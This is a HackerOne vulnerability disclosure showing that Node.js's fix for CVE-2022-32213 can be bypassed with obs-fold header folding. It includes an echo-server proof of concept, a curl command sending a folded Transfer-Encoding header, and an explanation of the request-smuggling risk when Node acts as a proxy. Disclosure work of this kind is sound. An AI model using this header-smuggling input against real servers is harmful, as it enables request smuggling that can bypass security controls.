HackerOne report H1:1630336 by haxatron1
Published Jul 07, 2022 - 5:14 p.m. (2022-07-07 17:14:53)

Node.js: CVE-2022-32213 bypass via obs-fold mechanic

Source: hackerone.com

6.5 Medium (CVSS3): Attack Vector NETWORK / Attack Complexity LOW / Privileges Required NONE / User Interaction NONE / Scope UNCHANGED / Confidentiality Impact LOW / Integrity Impact LOW / Availability Impact NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

6.4 Medium (CVSS2): Access Vector NETWORK / Access Complexity LOW / Authentication NONE / Confidentiality Impact PARTIAL / Integrity Impact PARTIAL / Availability Impact NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N

EPSS 0.02 Low (Percentile 87.4%)

Summary

The fix for CVE-2022-32213 can be bypassed using an obs-fold (obsolete line folding, RFC 7230 section 3.2.4: a header line continued by a following line that starts with a space or tab), which Node's HTTP parser still supports.

Proof-Of-Concept

const http = require('http');

// Minimal echo server for the PoC: drain the request body, then reply with
// the parsed request headers so the folded Transfer-Encoding value is visible.
http.createServer((request, response) => {
  let body = [];
  request.on('error', (err) => {
    response.end("error while reading body: " + err);
  }).on('data', (chunk) => {
    body.push(chunk);
  }).on('end', () => {
    body = Buffer.concat(body).toString();

    response.on('error', (err) => {
      response.end("error while sending response: " + err);
    });

    response.end("Headers: " + JSON.stringify(request.headers));
  });
}).listen(5000);

Send the obs-fold via curl (the bash $'...' quoting turns \r\n into a literal CRLF, so the header line is followed by a continuation line that begins with a space):

curl -vv -H $'Transfer-Encoding: chunked\r\n abc' --data "A" http://127.0.0.1:5000

Observe that the server accepted the request as chunked and incorrectly folded "abc" into the value of the Transfer-Encoding header: the printed headers show "transfer-encoding" as "chunked abc".

Headers: {"host":"127.0.0.1:5000","user-agent":"curl/7.83.1","accept":"*/*","transfer-encoding":"chunked abc","content-type":"application/x-www-form-urlencoded"}

Impact

If the Node.js HTTP module is used as a proxy, it parses the obs-folded Transfer-Encoding header as indicating a chunked request while folding the continuation line into the value, and therefore forwards Transfer-Encoding: chunked abc, which is not a valid Transfer-Encoding header, to the downstream server. A downstream server that does not treat that value as chunked (for example one that ignores the unrecognised coding and uses Content-Length instead) would disagree with Node about where the request body ends, which is the desynchronisation that HTTP request smuggling exploits. This is the same class of issue as CVE-2022-32213, whose fix this bypasses.
